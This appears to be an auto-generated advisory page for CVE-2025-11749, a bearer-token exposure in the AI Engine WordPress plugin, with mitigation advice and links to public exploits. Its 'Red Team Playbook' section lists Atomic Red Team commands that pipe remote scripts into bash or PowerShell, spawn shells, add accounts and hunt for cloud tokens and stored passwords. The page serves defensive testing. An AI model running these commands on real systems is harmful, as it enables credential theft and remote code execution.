CVE-2025-11749
Overview
This vulnerability is a sensitive information exposure stemming from improper access control in the tigroumeow AI Engine plugin for WordPress. The root cause lies in the /mcp/v1/ REST API endpoint which, when the 'No-Auth URL' feature is enabled, exposes the Bearer Token without authentication checks. This flaw affects all versions up to and including 3.1.3 and involves the API component responsible for session authentication tokens.
Vulnerability Description
The AI Engine plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.1.3 via the /mcp/v1/ REST API endpoint that exposes the 'Bearer Token' value when 'No-Auth URL' is enabled. This makes it possible for unauthenticated attackers to extract the bearer token, which can be used to gain access to a valid session and perform many actions like creating a new administrator account, leading to privilege escalation.
Impact
An unauthenticated attacker can extract the Bearer Token and leverage it to gain unauthorized access to the AI Engine plugin's session context. This enables actions such as creating new administrator accounts, resulting in privilege escalation. The vulnerability requires no user interaction or prior authentication and can be exploited remotely over the network, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. This leads to complete compromise of administrative controls within the affected WordPress environment.
Solution
Users should upgrade the tigroumeow AI Engine plugin to a version later than 3.1.3 where this issue is resolved, as documented in the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d). The plugin's source repository changeset 3380753 includes the necessary code fixes to restrict access to the Bearer Token. Administrators are advised to disable the 'No-Auth URL' feature until the patch is applied to prevent token exposure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the AI Engine plugin for WordPress is characterized by sensitive information exposure, specifically through the REST API endpoint. This flaw arises when the 'No-Auth URL' feature is enabled, allowing unauthenticated users to access the endpoint and retrieve the 'Bearer Token' value. The Bearer Token is a critical component in authentication, typically used to validate user sessions and authorize actions within the application. When exposed, this token can be exploited by malicious actors to impersonate legitimate users, thereby gaining unauthorized access to the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker can leverage tools such as automated scripts or manual HTTP requests to interact with the vulnerable REST API endpoint. By sending requests to the endpoint, the attacker can extract the Bearer Token without any authentication requirements. Once in possession of the token, the attacker can perform a multitude of actions, including creating new administrator accounts, modifying existing user permissions, or even deleting critical data. This exploitation can lead to severe consequences, including complete system takeover and data breaches.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the affected plugin for their WordPress installations. The potential for privilege escalation poses a direct threat to the integrity and confidentiality of sensitive information stored within the application. Businesses may face reputational damage, loss of customer trust, and potential legal ramifications due to data breaches. Additionally, the financial implications of remediation efforts, including incident response, system audits, and potential regulatory fines, can be substantial. Organizations must recognize that the exploitation of this vulnerability could lead to a cascading effect, impacting not only their operations but also their relationships with clients and stakeholders.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify exposed endpoints and assess the overall security posture of the application. Additionally, organizations should review their configurations to ensure that the 'No-Auth URL' feature is disabled unless absolutely necessary. Implementing strict access controls, such as requiring authentication for all API endpoints, can significantly reduce the risk of unauthorized access. Furthermore, organizations should consider employing web application firewalls (WAFs) to monitor and filter incoming traffic, blocking malicious requests before they reach the application.
In conclusion, the sensitive information exposure vulnerability within the AI Engine plugin for WordPress presents a critical risk to organizations utilizing this software. The ease of exploitation and the potential for severe consequences necessitate immediate attention from security professionals. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against unauthorized access and protect their sensitive data from malicious actors. The importance of maintaining a robust security posture cannot be overstated, as the implications of such vulnerabilities extend far beyond technical concerns, impacting the very foundation of trust between businesses and their clients.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE
exploits/multi/http/wp_ai_engine_mcp_rce
|
Emiliano Versini, Khaled Alenazi (Nxploited) | Unknown | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Nxploited/CVE-2025-11749
AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation
|
Nxploited | 8 | 4 | 2025-11-08 | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-11749 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/06eaf624-aedf-453d-8457-d03a572fac0d?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/ai-engine/trunk/labs/mcp.php#L226 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3380753/ai-engine#file10 |